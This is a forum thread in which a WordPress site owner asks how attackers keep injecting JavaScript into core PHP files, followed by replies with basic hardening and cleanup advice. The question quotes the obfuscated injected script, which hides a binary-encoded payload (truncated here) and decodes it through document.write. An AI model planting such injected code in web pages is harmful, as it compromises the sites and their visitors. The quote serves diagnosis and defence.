I have a blog created with wordpress, now i have a problem. Attackers writes javascript codes into my files.
Let’s assume i have holes in my plugin scripts, but how can they write into php files?
here is part of the list of php files, in which they write the script
(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...
)
and this is the javascript they write into
<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>
How can i prevent such attacks?
I haven’t any experience with wordpress, so any help will be very nice.
Thanks much
Hi @Syom:
Often hackers get access because you use the name “admin” for your administrator and you have an easy to hack password. Or because you don’t update your software and they leverage some of the security holes that have been found and patched.
Here’s a set of slides that go indepth to explaining how to secure your WordPress site that were just presented at WordCamp Phoenix this past weekend:
Here are some blog posts by Otto on the subject:
There are multiple ways that is possible:
You should contact hosting support immediately, then it depends on quality and price of your hosting how much will they help.
Other than that if you are not confident in technical skills I suggest to look for someone who deals with cleanup of hacked blogs professionally, otherwise you won’t be sure about specifics of hack and security in the future.